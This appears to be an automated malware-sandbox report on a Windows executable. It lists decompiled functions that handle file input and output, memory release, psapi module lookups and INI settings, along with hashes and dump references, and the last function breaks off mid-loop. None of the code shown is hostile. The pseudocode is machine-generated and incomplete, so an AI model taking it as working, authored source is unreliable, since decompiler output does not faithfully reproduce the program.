Part of subcall function 004053B1: GetLastError.KERNEL32(00000000,?,004097E7,00000000,?,?,00000001,0040BE1B,0040F454,00000000,00000000,00000000,00000000,75144E00,?), ref: 004053C5
Part of subcall function 004053B1: _snwprintf.MSVCRT ref: 004053F2
Part of subcall function 004053B1: MessageBoxW.USER32(?,?,Error,00000030), ref: 0040540B

Memory Dump Source

Source File: 00000009.00000002.280202091.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.280191131.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.280225522.000000000040F000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.280236044.0000000000412000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.280242741.0000000000414000.00000002.00020000.sdmp Download File

Similarity

API ID: ??2@??3@ChangeCloseCreateErrorFileFindHandleLastMessageNotification_snwprintf
String ID:
API String ID: 1161345128-0
Opcode ID: 1f12c5174dbf626df3c53de546eeba79fd62534e1c6cb3d42b78c857b20e2863
Instruction ID: 16bf936c0797f0b5653ba44e3a68d79ed8c61ea338f92f09e3d7ddd4fa5d63e9
Opcode Fuzzy Hash: 1f12c5174dbf626df3c53de546eeba79fd62534e1c6cb3d42b78c857b20e2863
Instruction Fuzzy Hash: ED218F32610200EBCB24AF66CC85A5F77A8EF44764F24853BF806B72C3DA7C9D418A59

Uniqueness

Uniqueness Score: -1.00%

Function 00404689, Relevance: 3.1, APIs: 1, Strings: 1, Instructions: 60
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00404689(void** __ecx, void* __eflags, intOrPtr _a4, void* _a8) {
				intOrPtr _v8;
				signed int _v12;
				signed int _v16;
				void* __edi;
				void* __esi;
				intOrPtr _t25;
				void* _t28;
				void** _t29;
				void* _t34;
				intOrPtr _t37;
				void* _t38;

				_t30 = __ecx;
				_v16 = _v16 & 0x00000000;
				_v12 = _v12 & 0x00000000;
				_t29 = __ecx;
				_v8 = 0x1388;
				E00406729( *((intOrPtr*)( *((intOrPtr*)(__ecx + 0x418)) + 0xec)),  &_v16);
				_t34 = _v16;
				if(E00404070(_t29, _t34, _a4) == 0) {
					_t37 = 0;
				} else {
					_t38 = _a8;
					if( *(_t34 + 0x24) != 1) {
						L6:
						__eflags =  *(_t34 + 0x24) & 0x00000004;
						if(( *(_t34 + 0x24) & 0x00000004) != 0) {
							_t25 = E0040460C(_t30, _t29, _t34, _t38); // executed
							goto L4;
						} else {
							memcpy(_t38, _t34,  *( *((intOrPtr*)(_t29 + 0x418)) + 0xec));
							_t37 = _a4;
						}
					} else {
						_t28 = E0040460C(_t30, _t29, _t34, _t38);
						_t44 = _t28;
						if(_t28 == 0) {
							goto L6;
						} else {
							_t25 = E00404689(_t29, _t44, _t28, _t38);
							L4:
							_t37 = _t25;
						}
					}
				}
				E00406710( &_v16);
				return _t37;
			}

0x00404689
0x0040468f
0x00404693
0x00404699
0x004046ab
0x004046b2
0x004046ba
0x004046c7
0x00404725
0x004046c9
0x004046cd
0x004046d0
0x004046fa
0x004046fa
0x004046fe
0x0040471e
0x00000000
0x00404700
0x0040470e
0x00404713
0x00404716
0x004046d2
0x004046d5
0x004046da
0x004046dc
0x00000000
0x004046de
0x004046e2
0x004046e7
0x004046e7
0x004046e7
0x004046dc
0x004046d0
0x004046ec
0x004046f7

APIs

Part of subcall function 00406729: ??3@YAXPAX@Z.MSVCRT ref: 00406730
Part of subcall function 00406729: ??2@YAPAXI@Z.MSVCRT ref: 0040673E

Part of subcall function 00404070: SetFilePointerEx.KERNELBASE(F@@,?,?,00000000,00000000,00000000,004046C5,00000000,00000000,?,00000000,F@@), ref: 0040408C

memcpy.MSVCRT ref: 0040470E

Strings

F@@, xrefs: 00404697, 004046D4, 0040471D

Memory Dump Source

Source File: 00000009.00000002.280202091.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.280191131.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.280225522.000000000040F000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.280236044.0000000000412000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.280242741.0000000000414000.00000002.00020000.sdmp Download File

Similarity

API ID: ??2@??3@FilePointermemcpy
String ID: F@@
API String ID: 402491248-234039029
Opcode ID: a2a877243d3c89850b15c365e55990fc21c52ff07033efc540406eb1b4e16218
Instruction ID: c3572d9dbfcd3884a1c52f4e364fbd30e8829f125a260a26c36de24cb81dc24a
Opcode Fuzzy Hash: a2a877243d3c89850b15c365e55990fc21c52ff07033efc540406eb1b4e16218
Instruction Fuzzy Hash: 9211C4B2900114B7DB109B968844F9FBBAC9F86358F05847ABE0677282D67DA905C7EC

Uniqueness

Uniqueness Score: -1.00%

Function 0040BC51, Relevance: 3.0, APIs: 2, Instructions: 25
COMMON

Download Yara Rule

C-Code - Quality: 92%

			E0040BC51(intOrPtr* __edi, void* __eflags) {
				void* __esi;
				void* _t10;
				intOrPtr* _t13;
				signed int* _t16;

				_t13 = __edi;
				_push( *((intOrPtr*)(__edi + 0x698)));
				 *__edi = 0x410438; // executed
				L0040E032(); // executed
				_t11 = __edi + 0x6c4;
				 *((intOrPtr*)(__edi + 0x6c4)) = 0x40f7b8;
				E00403F55(_t11 + 0x54);
				E00401357(_t11);
				E00406355(__edi + 0x6ac);
				_t16 = __edi + 0x694;
				_t10 =  *_t16;
				if(_t10 != 0) {
					_t10 = DeleteObject(_t10);
					 *_t16 =  *_t16 & 0x00000000;
				}
				 *_t13 = 0x40f468;
				return _t10;
			}

0x0040bc51
0x0040bc53
0x0040bc59
0x0040bc5f
0x0040bc64
0x0040bc6e
0x0040bc74
0x0040bc7b
0x0040bc86
0x0040bc8b
0x0040bc91
0x0040bc95
0x0040bc98
0x0040bc9e
0x0040bc9e
0x0040bca2
0x0040bca9

APIs

??3@YAXPAX@Z.MSVCRT ref: 0040BC5F

Part of subcall function 00403F55: free.MSVCRT(00000000,0040BC79,?,00000000,0040C0A1,/deleteregkey,/savelangfile,?,?,?,?,00000002,?,0040E23C,00000000), ref: 00403F5C

Part of subcall function 00406355: free.MSVCRT(00000000,004065BB,75144E00,?,00000000), ref: 0040635C

DeleteObject.GDI32(00000000), ref: 0040BC98

Memory Dump Source

Source File: 00000009.00000002.280202091.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.280191131.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.280225522.000000000040F000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.280236044.0000000000412000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.280242741.0000000000414000.00000002.00020000.sdmp Download File

Similarity

API ID: free$??3@DeleteObject
String ID:
API String ID: 2012871476-0
Opcode ID: d09d73ff1a65a7cf09805e5a43c409f63e09c8c95696eb59a3148a3799248faa
Instruction ID: 0aef1c026dc6713788bae9d6eb068f8a37dce8dfc4f8d72ecede120d92fabf63
Opcode Fuzzy Hash: d09d73ff1a65a7cf09805e5a43c409f63e09c8c95696eb59a3148a3799248faa
Instruction Fuzzy Hash: A8F0E5711002129FDB20BF35D8806C1B7E8FF41314F10403AE85977581CB79B478CA99

Uniqueness

Uniqueness Score: -1.00%

Function 0040536A, Relevance: 3.0, APIs: 2, Instructions: 16
fileCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040536A(void* _a4, void* _a8) {
				long _v8;
				int _t8;

				_t8 = WriteFile(_a4, _a8, wcslen(_a8) + _t6,  &_v8, 0); // executed
				return _t8;
			}

0x00405386
0x0040538d

APIs

wcslen.MSVCRT ref: 00405377
WriteFile.KERNELBASE(?,00000003,00000000,00000001,00000000,?,?,00408878,?,00000003,?,00409C9C,?,[,?,0040977A), ref: 00405386

Memory Dump Source

Source File: 00000009.00000002.280202091.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.280191131.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.280225522.000000000040F000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.280236044.0000000000412000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.280242741.0000000000414000.00000002.00020000.sdmp Download File

Similarity

API ID: FileWritewcslen
String ID:
API String ID: 3657313286-0
Opcode ID: 9602672fe1690bd860651872230ab81ccb290f1b65c84329dc0bcfd5fae289e8
Instruction ID: 0c605581e95f6f9092e1dff17d412b80520820f1d5211188770866c3677ad8a7
Opcode Fuzzy Hash: 9602672fe1690bd860651872230ab81ccb290f1b65c84329dc0bcfd5fae289e8
Instruction Fuzzy Hash: 19D09271100108BFEB119B51EC06EA93BADEB00268F108035B904981A1DAB6AE559B64

Uniqueness

Uniqueness Score: -1.00%

Function 00406729, Relevance: 3.0, APIs: 2, Instructions: 16
COMMON

Download Yara Rule

C-Code - Quality: 80%

			E00406729(signed int __edi, signed int* __esi) {
				signed int _t4;
				signed int _t9;
				signed int* _t10;

				_t10 = __esi;
				_t9 = __edi;
				_t4 =  *__esi;
				if(_t4 != 0) {
					_push(_t4);
					L0040E032();
					 *__esi =  *__esi & 0x00000000;
					__esi[1] = __esi[1] & 0x00000000;
				}
				_push(_t9); // executed
				L0040E038(); // executed
				 *_t10 = _t4;
				_t10[1] = _t9;
				return 1;
			}

0x00406729
0x00406729
0x00406729
0x0040672d
0x0040672f
0x00406730
0x00406735
0x00406738
0x0040673c
0x0040673d
0x0040673e
0x00406743
0x00406748
0x0040674c

APIs

??3@YAXPAX@Z.MSVCRT ref: 00406730
??2@YAPAXI@Z.MSVCRT ref: 0040673E

Memory Dump Source

Source File: 00000009.00000002.280202091.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.280191131.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.280225522.000000000040F000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.280236044.0000000000412000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.280242741.0000000000414000.00000002.00020000.sdmp Download File

Similarity

API ID: ??2@??3@
String ID:
API String ID: 1936579350-0
Opcode ID: d04ff0e86415aacd890a32ca8a69411fdf4c08b78325983762dc897493c55298
Instruction ID: c90c2ba6e28998f2d5eed0bd3ccee310cae7302d4f530886d19d51dc87062eb8
Opcode Fuzzy Hash: d04ff0e86415aacd890a32ca8a69411fdf4c08b78325983762dc897493c55298
Instruction Fuzzy Hash: 1BD052B24102008BE3309F36C401726B2E8AF20726F208C2EE0D1E20C0EBB898508B18

Uniqueness

Uniqueness Score: -1.00%

Function 0040623E, Relevance: 2.5, APIs: 2, Instructions: 14
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040623E(intOrPtr* __esi) {

				free( *(__esi + 0x10)); // executed
				free( *(__esi + 0xc)); // executed
				 *((intOrPtr*)(__esi)) = 0;
				 *((intOrPtr*)(__esi + 4)) = 0;
				 *(__esi + 0xc) = 0;
				 *(__esi + 0x10) = 0;
				 *((intOrPtr*)(__esi + 0x1c)) = 0;
				 *((intOrPtr*)(__esi + 8)) = 0;
				return 0;
			}

0x00406241
0x00406249
0x00406252
0x00406254
0x00406257
0x0040625a
0x0040625d
0x00406260
0x00406263

APIs

free.MSVCRT(?,004064D9,75144E00,?,00000000), ref: 00406241
free.MSVCRT(?,?,004064D9,75144E00,?,00000000), ref: 00406249

Memory Dump Source

Source File: 00000009.00000002.280202091.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.280191131.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.280225522.000000000040F000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.280236044.0000000000412000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.280242741.0000000000414000.00000002.00020000.sdmp Download File

Similarity

API ID: free
String ID:
API String ID: 1294909896-0
Opcode ID: 76f590108307dae64c078041f874814435b3e422dbb17f3958c47c4fcdcab9e9
Instruction ID: 28e7de91d8c6fb9b9a7e9865330149758d7ef971e5f4142975db03b93ce30916
Opcode Fuzzy Hash: 76f590108307dae64c078041f874814435b3e422dbb17f3958c47c4fcdcab9e9
Instruction Fuzzy Hash: 87D042B0904B008EC7B0DF3AD401A06BBF0BB083103108D3ED0EAD2A60EB75A0149F04

Uniqueness

Uniqueness Score: -1.00%

Function 0040D68E, Relevance: 1.5, APIs: 1, Instructions: 19COMMON

Download Yara Rule

APIs

GetPrivateProfileIntW.KERNEL32 ref: 0040D6B5

Part of subcall function 0040D51E: memset.MSVCRT ref: 0040D53D
Part of subcall function 0040D51E: _itow.MSVCRT ref: 0040D554
Part of subcall function 0040D51E: WritePrivateProfileStringW.KERNEL32(?,?,00000000), ref: 0040D563

Memory Dump Source

Source File: 00000009.00000002.280202091.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.280191131.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.280225522.000000000040F000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.280236044.0000000000412000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.280242741.0000000000414000.00000002.00020000.sdmp Download File

Similarity

API ID: PrivateProfile$StringWrite_itowmemset
String ID:
API String ID: 4232544981-0
Opcode ID: c8bc426b99cd421d8e6c78dc9e9d0a6f713dc6b41d52eb42d39c1684d3183b59
Instruction ID: 52ff98ee44e8e581f616b19192f74a8057abb6c9a5cdde8826008456e78d844a
Opcode Fuzzy Hash: c8bc426b99cd421d8e6c78dc9e9d0a6f713dc6b41d52eb42d39c1684d3183b59
Instruction Fuzzy Hash: E9E0B632400209BFCF126F94EC01AAA3F66FF04318F148469FD5C14561D3369574AF48

Uniqueness

Uniqueness Score: -1.00%

Function 0040D049, Relevance: 1.5, APIs: 1, Instructions: 15
COMMON

Download Yara Rule

C-Code - Quality: 37%

			E0040D049(struct HINSTANCE__** __eax, intOrPtr _a4, intOrPtr _a8) {
				void* __esi;
				intOrPtr* _t6;
				void* _t8;
				struct HINSTANCE__** _t10;

				_t10 = __eax;
				E0040D071(__eax);
				_t1 = _t10 + 0x14; // 0x8d000001
				_t6 =  *_t1;
				if(_t6 == 0) {
					return 0;
				}
				_t8 =  *_t6(_a4, 0, _a8, 0x104); // executed
				return _t8;
			}

0x0040d04a
0x0040d04c
0x0040d051
0x0040d051
0x0040d057
0x00000000
0x0040d06c
0x0040d068
0x00000000

APIs

Part of subcall function 0040D071: LoadLibraryW.KERNELBASE(psapi.dll,0040C7D4,0040D051,751459F0,0040CF75,?,?), ref: 0040D07C
Part of subcall function 0040D071: GetProcAddress.KERNEL32(00000000,GetModuleBaseNameW), ref: 0040D090
Part of subcall function 0040D071: GetProcAddress.KERNEL32(0040C7D4,EnumProcessModules), ref: 0040D09C
Part of subcall function 0040D071: GetProcAddress.KERNEL32(0040C7D4,EnumProcessModulesEx), ref: 0040D0A8
Part of subcall function 0040D071: GetProcAddress.KERNEL32(0040C7D4,GetModuleFileNameExW), ref: 0040D0B4
Part of subcall function 0040D071: GetProcAddress.KERNEL32(0040C7D4,EnumProcesses), ref: 0040D0C0
Part of subcall function 0040D071: GetProcAddress.KERNEL32(0040C7D4,GetModuleInformation), ref: 0040D0CC

K32GetModuleFileNameExW.KERNEL32(00000104,00000000,0040CF75,00000104,0040CF75,?,?), ref: 0040D068

Memory Dump Source

Source File: 00000009.00000002.280202091.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.280191131.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.280225522.000000000040F000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.280236044.0000000000412000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.280242741.0000000000414000.00000002.00020000.sdmp Download File

Similarity

API ID: AddressProc$FileLibraryLoadModuleName
String ID:
API String ID: 3821362017-0
Opcode ID: 1cf08a23b09b0d3d97ff26b013f401c3bd3ea652a3947e7a2b393679c14be32e
Instruction ID: 2a72a0c1e2ab3da33e39831b93c2ef8746b4f49573bf5205cfb9ee226a22e14b
Opcode Fuzzy Hash: 1cf08a23b09b0d3d97ff26b013f401c3bd3ea652a3947e7a2b393679c14be32e
Instruction Fuzzy Hash: DBD02231B14300ABE330EAF08C00F4BA6D86F40B18F008C3AB189F70D0C6B4C809531A

Uniqueness

Uniqueness Score: -1.00%

Function 00405E43, Relevance: 1.5, APIs: 1, Instructions: 13
fileCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00405E43(void* __ecx, void* _a4, void* _a8, long _a12) {
				long _v8;
				int _t8;

				_v8 = _v8 & 0x00000000;
				_t8 = ReadFile(_a4, _a8, _a12,  &_v8, 0); // executed
				return _t8;
			}

0x00405e47
0x00405e5a
0x00405e61

APIs

ReadFile.KERNELBASE(?,?,?,00000000,00000000,?,?,0040400E,00000000,?,00000400,?,00000000,00403B9A,?), ref: 00405E5A

Memory Dump Source

Source File: 00000009.00000002.280202091.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.280191131.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.280225522.000000000040F000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.280236044.0000000000412000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.280242741.0000000000414000.00000002.00020000.sdmp Download File

Similarity

API ID: FileRead
String ID:
API String ID: 2738559852-0
Opcode ID: 010b72b188bcb63d068a0cd5cc08e11c66c185d99f429563d5beb6ad59adc6ad
Instruction ID: bef0590ae594767b07390076585e3b54dba5209a2ce075fea525828f997dfdeb
Opcode Fuzzy Hash: 010b72b188bcb63d068a0cd5cc08e11c66c185d99f429563d5beb6ad59adc6ad
Instruction Fuzzy Hash: B7D0C93141020DFBDF01CF80DD06FDD7B7DFB04359F104064BA10A5060D7759A14AB94

Uniqueness

Uniqueness Score: -1.00%

Function 00405E62, Relevance: 1.5, APIs: 1, Instructions: 13
fileCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00405E62(void* __ecx, void* _a4, void* _a8, long _a12) {
				long _v8;
				int _t8;

				_v8 = _v8 & 0x00000000;
				_t8 = WriteFile(_a4, _a8, _a12,  &_v8, 0); // executed
				return _t8;
			}

0x00405e66
0x00405e79
0x00405e80

APIs

WriteFile.KERNELBASE(?,?,75144E00,00000000,00000000,?,?,00409760,00000000,0040FF4C,00000002,?,?,00000001,0040BE1B,0040F454), ref: 00405E79

Memory Dump Source

Source File: 00000009.00000002.280202091.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.280191131.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.280225522.000000000040F000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.280236044.0000000000412000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.280242741.0000000000414000.00000002.00020000.sdmp Download File

Similarity

API ID: FileWrite
String ID:
API String ID: 3934441357-0
Opcode ID: c5eb87db1ef907e83a15267b5f116f03c5c857c02999e1eac1b041104452b5ef
Instruction ID: e108cc57461cd09051f83d149da4ae7cbb94a9151abf142b08e99a69ba8f508e
Opcode Fuzzy Hash: c5eb87db1ef907e83a15267b5f116f03c5c857c02999e1eac1b041104452b5ef
Instruction Fuzzy Hash: 9DD0C93101020DFBDF01CF80DD06FDD7B7DEB04359F104064BA00A5060C7B59A14AB54

Uniqueness

Uniqueness Score: -1.00%

Function 00406710, Relevance: 1.5, APIs: 1, Instructions: 12
COMMON

Download Yara Rule

C-Code - Quality: 84%

			E00406710(signed int* __ecx) {
				signed int _t3;

				_t3 =  *__ecx;
				if(_t3 != 0) {
					_push(_t3); // executed
					L0040E032(); // executed
					 *__ecx =  *__ecx & 0x00000000;
					__ecx[1] = __ecx[1] & 0x00000000;
					return _t3;
				}
				return _t3;
			}

0x00406713
0x00406717
0x00406719
0x0040671a
0x0040671f
0x00406722
0x00000000
0x00406726
0x00406728

APIs

??3@YAXPAX@Z.MSVCRT ref: 0040671A

Memory Dump Source

Source File: 00000009.00000002.280202091.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.280191131.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.280225522.000000000040F000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.280236044.0000000000412000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.280242741.0000000000414000.00000002.00020000.sdmp Download File

Similarity

API ID: ??3@
String ID:
API String ID: 613200358-0
Opcode ID: 9bd186e89429b860fa5ddfbd94c8895d53f853a2d7264046d48f8f1e41839238
Instruction ID: 5339db72a64abfad3c15032fde593e64a1d815d69f9877ad78659c6e85a1ca85
Opcode Fuzzy Hash: 9bd186e89429b860fa5ddfbd94c8895d53f853a2d7264046d48f8f1e41839238
Instruction Fuzzy Hash: 13C012B28282214BE7345A29E80076262D89F14366F22082EE480A31C0DAB89C808658

Uniqueness

Uniqueness Score: -1.00%

Function 00405351, Relevance: 1.5, APIs: 1, Instructions: 10
fileCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00405351(WCHAR* _a4) {
				void* _t3;

				_t3 = CreateFileW(_a4, 0x40000000, 1, 0, 2, 0, 0); // executed
				return _t3;
			}

0x00405363
0x00405369

APIs

CreateFileW.KERNELBASE(00000000,40000000,00000001,00000000,00000002,00000000,00000000,0040972A,?,?,?,00000000,00000002,?,?,00000001), ref: 00405363

Memory Dump Source

Source File: 00000009.00000002.280202091.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.280191131.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.280225522.000000000040F000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.280236044.0000000000412000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.280242741.0000000000414000.00000002.00020000.sdmp Download File

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: b680f323cfde0812eaa853d45ec535210a74fce6e52df2a6edf0fc9c67542069
Instruction ID: 1e51560ea2d226d7cbdf2b9922d616c5fe3e6071316244dee5f443afb53d0edf
Opcode Fuzzy Hash: b680f323cfde0812eaa853d45ec535210a74fce6e52df2a6edf0fc9c67542069
Instruction Fuzzy Hash: B1C092B0290200BEFE204A10AD0AF77355EE780700F1084307A00E80E1C2A14C058524

Uniqueness

Uniqueness Score: -1.00%

Function 00405338, Relevance: 1.5, APIs: 1, Instructions: 10
fileCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00405338(WCHAR* _a4) {
				void* _t3;

				_t3 = CreateFileW(_a4, 0x80000000, 3, 0, 3, 0, 0); // executed
				return _t3;
			}

0x0040534a
0x00405350

APIs

CreateFileW.KERNELBASE(?,80000000,00000003,00000000,00000003,00000000,00000000,00403FF7,?,?,00000000,00403B9A,?), ref: 0040534A

Memory Dump Source

Source File: 00000009.00000002.280202091.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.280191131.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.280225522.000000000040F000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.280236044.0000000000412000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.280242741.0000000000414000.00000002.00020000.sdmp Download File

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 83eae67f61fdf2e100365e4956c39274e7302c90c3fc809a9cab9d68c9c26962
Instruction ID: d588f5942abdbf62074f27fc8161704726317c11aca05e571d26f2c48b98c5da
Opcode Fuzzy Hash: 83eae67f61fdf2e100365e4956c39274e7302c90c3fc809a9cab9d68c9c26962
Instruction Fuzzy Hash: B3C092B0280200BEFE224A10FD16F36355DE780700F2044347E00F80E0C1604E158524

Uniqueness

Uniqueness Score: -1.00%

Function 0040DA82, Relevance: 1.5, APIs: 1, Instructions: 8
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040DA82(struct HINSTANCE__* _a4, WCHAR* _a8) {

				EnumResourceNamesW(_a4, _a8, E0040D9FC, 0); // executed
				return 1;
			}

0x0040da91
0x0040da9a

APIs

EnumResourceNamesW.KERNELBASE(?,?,0040D9FC,00000000), ref: 0040DA91

Memory Dump Source

Source File: 00000009.00000002.280202091.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.280191131.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.280225522.000000000040F000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.280236044.0000000000412000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.280242741.0000000000414000.00000002.00020000.sdmp Download File

Similarity

API ID: EnumNamesResource
String ID:
API String ID: 3334572018-0
Opcode ID: aaa027c10fa78c39d5f0445afb734b26800a59b0cae26a5917b0f34e50669d9c
Instruction ID: 51e3a4b42ca36b746c75c5eb4a2aee4057f89303c93404922418ae0f581905ac
Opcode Fuzzy Hash: aaa027c10fa78c39d5f0445afb734b26800a59b0cae26a5917b0f34e50669d9c
Instruction Fuzzy Hash: F5C09B3356438197C7119F508C09F1B7A95BB54705F504C397151A40E1C7714018A605

Uniqueness

Uniqueness Score: -1.00%

Function 0040405E, Relevance: 1.5, APIs: 1, Instructions: 7
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040405E(void** __esi) {
				void* _t1;
				signed int* _t2;

				_t2 = __esi;
				_t1 =  *__esi;
				if(_t1 != 0xffffffff) {
					_t1 = FindCloseChangeNotification(_t1); // executed
				}
				 *_t2 =  *_t2 | 0xffffffff;
				return _t1;
			}

0x0040405e
0x0040405e
0x00404063
0x00404066
0x00404066
0x0040406c
0x0040406f

APIs

FindCloseChangeNotification.KERNELBASE(00000000,00403FC6,?,0040BE7E), ref: 00404066

Memory Dump Source

Source File: 00000009.00000002.280202091.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.280191131.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.280225522.000000000040F000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.280236044.0000000000412000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.280242741.0000000000414000.00000002.00020000.sdmp Download File

Similarity

API ID: ChangeCloseFindNotification
String ID:
API String ID: 2591292051-0
Opcode ID: bc5a44fb32040061edbda8d3543cb511c92e7b0a37bc3428954c49ae59e4d506
Instruction ID: 40547022017336ee125913f65e591b655fd6556432e54264b79cbfeb0dc3c2d4
Opcode Fuzzy Hash: bc5a44fb32040061edbda8d3543cb511c92e7b0a37bc3428954c49ae59e4d506
Instruction Fuzzy Hash: ECB09270500541CBE6345F78884980A7AA4AA813703B44B28A1F6F10F2D33888468A14

Uniqueness

Uniqueness Score: -1.00%

Function 004057D1, Relevance: 1.5, APIs: 1, Instructions: 7
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E004057D1(WCHAR* _a4) {
				long _t4;

				_t4 = GetFileAttributesW(_a4); // executed
				return 0 | _t4 != 0xffffffff;
			}

0x004057d5
0x004057e5

APIs

GetFileAttributesW.KERNELBASE(?,004071DA,?,00407291,00000000,?,00000000,00000208,?), ref: 004057D5

Memory Dump Source

Source File: 00000009.00000002.280202091.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.280191131.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.280225522.000000000040F000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.280236044.0000000000412000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.280242741.0000000000414000.00000002.00020000.sdmp Download File

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: 8e4c376cf7c570f1656cc04afb23f0be4d71cb0539670ea516d7700e7cbaecd3
Instruction ID: f1cceac889999bb919f5bca999730fd8e3c757b1acafb66fb331f39110631968
Opcode Fuzzy Hash: 8e4c376cf7c570f1656cc04afb23f0be4d71cb0539670ea516d7700e7cbaecd3
Instruction Fuzzy Hash: FFB012B52100014BCB1807349D4508D35905F44631B31873CB037D0CF0E730CCA8BA00

Uniqueness

Uniqueness Score: -1.00%

Function 004048DA, Relevance: 1.3, APIs: 1, Instructions: 59
COMMON

Download Yara Rule

C-Code - Quality: 90%

			E004048DA(void* __ecx, void* __edx, intOrPtr* _a4, intOrPtr _a8, void** _a12) {
				intOrPtr _v8;
				intOrPtr _v12;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr _t20;
				void* _t22;
				intOrPtr _t25;
				intOrPtr _t29;
				intOrPtr _t31;
				void* _t38;
				void** _t40;
				intOrPtr* _t47;

				_t38 = __edx;
				_t34 = __ecx;
				_push(__ecx);
				_push(__ecx);
				_t44 = _a4;
				_t40 = _a12;
				_t31 = 0;
				 *((intOrPtr*)(_a4 + 0x248)) = _t40;
				_v8 = 0;
				if( *((intOrPtr*)(_t40 + 0x428)) <= 0) {
					L3:
					_t20 = 0;
					L4:
					if(_t20 != 0) {
						_t22 = E00404489(_t44 + 0x14, _t34, _t38, _t40, _t20); // executed
						_t53 = _t22;
						if(_t22 != 0) {
							E00406729( *((intOrPtr*)( *((intOrPtr*)(_t40 + 0x418)) + 0xec)), _t44 + 4);
							_t47 = _a4;
							_t25 = E00404689(_a12, _t53,  *((intOrPtr*)(_t47 + 0x220)),  *((intOrPtr*)(_t44 + 4))); // executed
							 *_t47 = _t25;
							 *((intOrPtr*)(_t47 + 0x10)) = 1;
							_v8 = 1;
						}
					}
					return _v8;
				} else {
					goto L1;
				}
				while(1) {
					L1:
					_t29 = E00403F2B(_t31, _t40 + 0x41c);
					_push(_a8);
					_v12 = _t29;
					L0040E03E();
					_t34 = _t29;
